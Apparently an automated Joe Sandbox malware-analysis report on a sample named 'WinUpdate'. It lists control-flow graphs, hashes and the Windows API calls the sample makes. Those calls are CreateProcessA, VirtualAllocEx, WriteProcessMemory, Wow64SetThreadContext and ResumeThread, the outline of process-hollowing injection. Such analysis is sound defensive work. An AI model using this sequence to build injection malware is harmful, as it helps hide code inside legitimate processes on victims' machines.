25227 508bb60 WriteProcessMemory 25223->25227 25224 508d587 25224->25154 25225->25224 25226->25224 25227->25224 25284 508bde8 25228->25284 25288 508bddd 25228->25288 25233 508daec 25232->25233 25234 508dbe6 25233->25234 25235 508b918 ResumeThread 25233->25235 25236 508b910 ResumeThread 25233->25236 25235->25233 25236->25233 25238 508b9c8 Wow64SetThreadContext 25237->25238 25240 508ba55 25238->25240 25240->25182 25242 508ba0d Wow64SetThreadContext 25241->25242 25244 508ba55 25242->25244 25244->25182 25246 508baa0 VirtualAllocEx 25245->25246 25248 508bb1d 25246->25248 25248->25186 25250 508bae0 VirtualAllocEx 25249->25250 25252 508bb1d 25250->25252 25252->25186 25254 508bcb6 ReadProcessMemory 25253->25254 25257 508bd2f 25253->25257 25256 508bcdf 25254->25256 25256->25190 25257->25190 25259 508bc9b ReadProcessMemory 25258->25259 25261 508bcdf 25259->25261 25261->25190 25263 508bc4f ReadProcessMemory 25262->25263 25264 508bbd6 WriteProcessMemory 25262->25264 25267 508bcdf 25263->25267 25265 508bbff 25264->25265 25265->25190 25267->25190 25269 508bba8 WriteProcessMemory 25268->25269 25271 508bbff 25269->25271 25271->25196 25273 508bae6 25272->25273 25273->25272 25274 508bbd6 WriteProcessMemory 25273->25274 25275 508bbff 25274->25275 25275->25196 25277 508b958 ResumeThread 25276->25277 25279 508b989 25277->25279 25279->25218 25281 508b918 ResumeThread 25280->25281 25283 508b989 25281->25283 25283->25218 25285 508be71 CreateProcessA 25284->25285 25287 508c033 25285->25287 25289 508bde8 CreateProcessA 25288->25289 25291 508c033 25289->25291 25292 afd418 25293 afd45e GetCurrentProcess 25292->25293 25295 afd4b0 GetCurrentThread 25293->25295 25297 afd4a9 25293->25297 25296 afd4ed GetCurrentProcess 25295->25296 25299 afd4e6 25295->25299 25298 afd523 25296->25298 25297->25295 25300 afd54b GetCurrentThreadId 25298->25300 25299->25296 25301 afd57c 25300->25301 25138 508e540 25139 508e547 25138->25139 25141 508e3ba 25138->25141 25141->25138 25142 5088844 25141->25142 25143 508e5e0 PostMessageW 25142->25143 25144 508e64c 25143->25144 25144->25141 25145 afd660 DuplicateHandle 25146 afd6f6 25145->25146 25302 afac90 25306 afad79 25302->25306 25311 afad88 25302->25311 25303 afac9f 25307 afadbc 25306->25307 25308 afad99 25306->25308 25307->25303 25308->25307 25309 afafc0 GetModuleHandleW 25308->25309 25310 afafed 25309->25310 25310->25303 25312 afadbc 25311->25312 25313 afad99 25311->25313 25312->25303 25313->25312 25314 afafc0 GetModuleHandleW 25313->25314 25315 afafed 25314->25315 25315->25303

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD496
                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AFD4D3
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD510
                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AFD569
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 76e4228bdfd83e26ea6155e1ba91b8991731ee1b2799958e087b26d097d0f042
                                                                                                                                                                                                                                                                                                • Instruction ID: 27078b97aaffe3635c0c271d89e59315ec1f25c3fcc658bec5772a2e8f6cfa9a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76e4228bdfd83e26ea6155e1ba91b8991731ee1b2799958e087b26d097d0f042
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6517BB0900349CFEB15DFA9D948BAEBBF1EF88314F20805DE509A7250D778A944CB65

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD496
                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00AFD4D3
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00AFD510
                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00AFD569
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3b8026fa9a7b8945138ad38fe0ee9b20b1091e9d8a887fae9681b23f672eae85
                                                                                                                                                                                                                                                                                                • Instruction ID: 70ceeed84ddfd8ec9f404df4e1afede44b51bff4a3b8cfb1983304756ae7a2c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b8026fa9a7b8945138ad38fe0ee9b20b1091e9d8a887fae9681b23f672eae85
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B5179B0900309CFEB15DFA9D948BAEBBF1FF88314F208059E509A7350DB78A944CB65

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 44 508bc48-508bc4d 45 508bc4f-508bcdd ReadProcessMemory 44->45 46 508bbd6-508bbfd WriteProcessMemory 44->46 55 508bcdf-508bce5 45->55 56 508bce6-508bd16 45->56 48 508bbff-508bc05 46->48 49 508bc06-508bc36 46->49 48->49 55->56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0508BBF0
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0508BCD0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcess$ReadWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3589323503-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a1345b082a1e93cd6ddb46df286ec4b3411e2f2ba71b1f26ca8c9bff349eaa12
                                                                                                                                                                                                                                                                                                • Instruction ID: 6344ec1da79d4932a4517aec7680a5edcd85fc5a49242e92c7f7f4c7dd3666d7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1345b082a1e93cd6ddb46df286ec4b3411e2f2ba71b1f26ca8c9bff349eaa12
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 674147728003499FDB10DFAAD884BEEBBF5FF48320F14842AE559A7250CB789550DB61

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 60 508bddd-508be7d 63 508be7f-508be89 60->63 64 508beb6-508bed6 60->64 63->64 65 508be8b-508be8d 63->65 71 508bed8-508bee2 64->71 72 508bf0f-508bf3e 64->72 66 508be8f-508be99 65->66 67 508beb0-508beb3 65->67 69 508be9b 66->69 70 508be9d-508beac 66->70 67->64 69->70 70->70 73 508beae 70->73 71->72 74 508bee4-508bee6 71->74 78 508bf40-508bf4a 72->78 79 508bf77-508c031 CreateProcessA 72->79 73->67 76 508bee8-508bef2 74->76 77 508bf09-508bf0c 74->77 80 508bef4 76->80 81 508bef6-508bf05 76->81 77->72 78->79 83 508bf4c-508bf4e 78->83 92 508c03a-508c0c0 79->92 93 508c033-508c039 79->93 80->81 81->81 82 508bf07 81->82 82->77 84 508bf50-508bf5a 83->84 85 508bf71-508bf74 83->85 87 508bf5c 84->87 88 508bf5e-508bf6d 84->88 85->79 87->88 88->88 90 508bf6f 88->90 90->85 103 508c0d0-508c0d4 92->103 104 508c0c2-508c0c6 92->104 93->92 106 508c0e4-508c0e8 103->106 107 508c0d6-508c0da 103->107 104->103 105 508c0c8 104->105 105->103 109 508c0f8-508c0fc 106->109 110 508c0ea-508c0ee 106->110 107->106 108 508c0dc 107->108 108->106 111 508c10e-508c115 109->111 112 508c0fe-508c104 109->112 110->109 113 508c0f0 110->113 114 508c12c 111->114 115 508c117-508c126 111->115 112->111 113->109 117 508c12d 114->117 115->114 117->117
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0508C01E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7ecddebea1b086d38c4662cb344286e16c48f60b8a3c46f9924dab257f92e9d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 36a390ce022f24166d99c03ed626ee51bf572f19c04d382efd5bb713b77b01bf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ecddebea1b086d38c4662cb344286e16c48f60b8a3c46f9924dab257f92e9d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73A17C70D00219DFEF20DFA8D845BADBBF2BF48310F1485A9E889A7240DB759985CF91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 118 508bde8-508be7d 120 508be7f-508be89 118->120 121 508beb6-508bed6 118->121 120->121 122 508be8b-508be8d 120->122 128 508bed8-508bee2 121->128 129 508bf0f-508bf3e 121->129 123 508be8f-508be99 122->123 124 508beb0-508beb3 122->124 126 508be9b 123->126 127 508be9d-508beac 123->127 124->121 126->127 127->127 130 508beae 127->130 128->129 131 508bee4-508bee6 128->131 135 508bf40-508bf4a 129->135 136 508bf77-508c031 CreateProcessA 129->136 130->124 133 508bee8-508bef2 131->133 134 508bf09-508bf0c 131->134 137 508bef4 133->137 138 508bef6-508bf05 133->138 134->129 135->136 140 508bf4c-508bf4e 135->140 149 508c03a-508c0c0 136->149 150 508c033-508c039 136->150 137->138 138->138 139 508bf07 138->139 139->134 141 508bf50-508bf5a 140->141 142 508bf71-508bf74 140->142 144 508bf5c 141->144 145 508bf5e-508bf6d 141->145 142->136 144->145 145->145 147 508bf6f 145->147 147->142 160 508c0d0-508c0d4 149->160 161 508c0c2-508c0c6 149->161 150->149 163 508c0e4-508c0e8 160->163 164 508c0d6-508c0da 160->164 161->160 162 508c0c8 161->162 162->160 166 508c0f8-508c0fc 163->166 167 508c0ea-508c0ee 163->167 164->163 165 508c0dc 164->165 165->163 168 508c10e-508c115 166->168 169 508c0fe-508c104 166->169 167->166 170 508c0f0 167->170 171 508c12c 168->171 172 508c117-508c126 168->172 169->168 170->166 174 508c12d 171->174 172->171 174->174
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0508C01E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 81a83f28f44e4d52267af2a21c5be13628e45070bc78c265468c04137c69b860
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e3d3237ce20de6ce60b7f99c6de0974be2ff68b829b210010a23ebe8c74a699
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81a83f28f44e4d52267af2a21c5be13628e45070bc78c265468c04137c69b860
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97916A71D00219DFEF20DFA8D845BADBBF2BF48310F1481AAE849A7240DB759985CF91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 175 afad88-afad97 176 afad99-afada6 call afa0e0 175->176 177 afadc3-afadc7 175->177 182 afadbc 176->182 183 afada8 176->183 179 afaddb-afae1c 177->179 180 afadc9-afadd3 177->180 186 afae1e-afae26 179->186 187 afae29-afae37 179->187 180->179 182->177 230 afadae call afb020 183->230 231 afadae call afb010 183->231 186->187 188 afae5b-afae5d 187->188 189 afae39-afae3e 187->189 194 afae60-afae67 188->194 191 afae49 189->191 192 afae40-afae47 call afa0ec 189->192 190 afadb4-afadb6 190->182 193 afaef8-afafb8 190->193 196 afae4b-afae59 191->196 192->196 225 afafba-afafbd 193->225 226 afafc0-afafeb GetModuleHandleW 193->226 197 afae69-afae71 194->197 198 afae74-afae7b 194->198 196->194 197->198 200 afae7d-afae85 198->200 201 afae88-afae91 call afa0fc 198->201 200->201 206 afae9e-afaea3 201->206 207 afae93-afae9b 201->207 208 afaea5-afaeac 206->208 209 afaec1-afaece 206->209 207->206 208->209 211 afaeae-afaebe call afa10c call afa11c 208->211 216 afaef1-afaef7 209->216 217 afaed0-afaeee 209->217 211->209 217->216 225->226 227 afafed-afaff3 226->227 228 afaff4-afb008 226->228 227->228 230->190 231->190
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00AFAFDE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0a01df408e3b69ffe4baca494777bc6c7ce7d99946cee71c0b9f92e8a9e96ac0
                                                                                                                                                                                                                                                                                                • Instruction ID: 49370f10f8ee73fd95169868aba24d02d7abae6fdeb8e95ce96b00203c6a8448
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a01df408e3b69ffe4baca494777bc6c7ce7d99946cee71c0b9f92e8a9e96ac0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F7147B0A00B098FD724DF69D4417AABBF1FF98304F00892DE58AD7A50DB74E949CB91

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 232 af5a84-af5b14
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dfd0f01f11d57c878b9436f829b086457e57c2dcc241039d16ab27a28fac1642
                                                                                                                                                                                                                                                                                                • Instruction ID: cfe9279b028d36d86d90cf2aaa71a01b6d7731d797c0874a8f40151c7b69d512
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfd0f01f11d57c878b9436f829b086457e57c2dcc241039d16ab27a28fac1642
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B319A71C04A4DCFDB25CBF8C8897ADBBB0EF46324F50828AD245AB251C776A946CB51

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 235 af590c-af598c 236 af598f-af59d9 CreateActCtxA 235->236 238 af59db-af59e1 236->238 239 af59e2-af5a3c 236->239 238->239 246 af5a3e-af5a41 239->246 247 af5a4b-af5a4f 239->247 246->247 248 af5a51-af5a5d 247->248 249 af5a60 247->249 248->249 251 af5a61 249->251 251->251
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00AF59C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b668209e03fcc96ead33cf47ace95924a37f0fd7f7fe794beb8aad0558afc23a
                                                                                                                                                                                                                                                                                                • Instruction ID: 9e915392d68191df55de695b384c17ad478a24be62d70e9729ab731ba024227b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b668209e03fcc96ead33cf47ace95924a37f0fd7f7fe794beb8aad0558afc23a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D14102B0C00B1DCBDB24CFA9C884BDEBBB1BF49704F20855AD508AB251DB716946CF50

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 252 af44b4-af59d9 CreateActCtxA 256 af59db-af59e1 252->256 257 af59e2-af5a3c 252->257 256->257 264 af5a3e-af5a41 257->264 265 af5a4b-af5a4f 257->265 264->265 266 af5a51-af5a5d 265->266 267 af5a60 265->267 266->267 269 af5a61 267->269 269->269
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00AF59C9
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2154829158.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_af0000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8715390896b21cc5f3ed5ee88611d76bf379341ae89e8abd2f8f8a993077f58b
                                                                                                                                                                                                                                                                                                • Instruction ID: d4500c7e1fcfdab0c98347785b58f0a571e335822159e72b6486237bf3fcd989
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8715390896b21cc5f3ed5ee88611d76bf379341ae89e8abd2f8f8a993077f58b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41F2B0C00B1DCBDB24DFA9C884B9DBBB5BF48714F20816AD508AB251DBB56945CF90

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 270 508bd28-508bd2c 271 508bd2f-508bda2 270->271 272 508bcb6-508bcb8 270->272 284 508bdab-508bdd0 271->284 285 508bda4-508bdaa 271->285 274 508bcba-508bccc 272->274 275 508bcce-508bcdd ReadProcessMemory 272->275 274->275 276 508bcdf-508bce5 275->276 277 508bce6-508bd16 275->277 276->277 285->284
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0508BCD0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 93ac451da419816b2e30ea93a6f6566db8a7eb66a5fb9fa08b1235f201a1190e
                                                                                                                                                                                                                                                                                                • Instruction ID: e5444843b4b0d3bb3e568eba0ca1b70b5bd2c844c8f0fdf6db5459679b4723b3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93ac451da419816b2e30ea93a6f6566db8a7eb66a5fb9fa08b1235f201a1190e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8316E72900349CFDB20DFA9D445BEEFFF4AF88324F14841AD555A7250CB799444CBA5

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 289 508e5d9-508e5dd 290 508e5df-508e64a PostMessageW 289->290 291 508e566-508e5af 289->291 293 508e64c-508e652 290->293 294 508e653-508e667 290->294 297 508e5b8-508e5cc 291->297 298 508e5b1-508e5b7 291->298 293->294 298->297
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0508E63D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a4b78aab0912a327114cfef11cb4149d78988b876ac95726b1fdec8819de7852
                                                                                                                                                                                                                                                                                                • Instruction ID: 193a81b55202997c3a7ef4db960cfb67d0f2ae73149a8b5f9427ebaba1da78ec
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b78aab0912a327114cfef11cb4149d78988b876ac95726b1fdec8819de7852
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D3104B58003099FDB10DF99D485BEEFBF8FB88324F10841AE559A7250C375A544CFA1

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 301 508bb59-508bb5d 302 508bb5f 301->302 303 508bae6 301->303 304 508bb60-508bbae 302->304 303->301 303->304 306 508bbbe-508bbd3 304->306 307 508bbb0-508bbbc 304->307 309 508bbd6-508bbfd WriteProcessMemory 306->309 307->306 310 508bbff-508bc05 309->310 311 508bc06-508bc36 309->311 310->311
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0508BBF0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9ed0466792d05e86b457099f796480b51caa89bc45fe69f10c0b39a0927d2a54
                                                                                                                                                                                                                                                                                                • Instruction ID: 63d486baf23e2a6aaf474866cbdf0d27e017ce99b38cf60492e46524fa83eaa3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ed0466792d05e86b457099f796480b51caa89bc45fe69f10c0b39a0927d2a54
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46214871900349DFDB20DFAAD881BEEBBF4FF48310F148429E959A7250D7B89950CBA4

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 315 508bb60-508bbae 317 508bbbe-508bbfd WriteProcessMemory 315->317 318 508bbb0-508bbbc 315->318 321 508bbff-508bc05 317->321 322 508bc06-508bc36 317->322 318->317 321->322
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0508BBF0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_5080000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 088420c0f17634f25f2ae5557727a0b725938fea1d5aa7d31d36e96021eb5e0d
                                                                                                                                                                                                                                                                                                • Instruction ID: 7dcb76a0c10b4edbf6ea7a61a8addbb016945f92fbe9230749c97c962325d8ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 088420c0f17634f25f2ae5557727a0b725938fea1d5aa7d31d36e96021eb5e0d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E212671900349DFDB10DFAAC885BEEBBF5FF48310F148429E959A7250C7789950CBA4

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 326 508b9c1-508ba13 329 508ba23-508ba53 Wow64SetThreadContext 326->329 330 508ba15-508ba21 326->330 332 508ba5c-508ba8c 329->332 333 508ba55-508ba5b 329->333 330->329 333->332
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0508BA46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2172365504.0000000005080000.00000040.00000800.00020000.00000000.sdmp, Offset: 05080000, based on PE: false
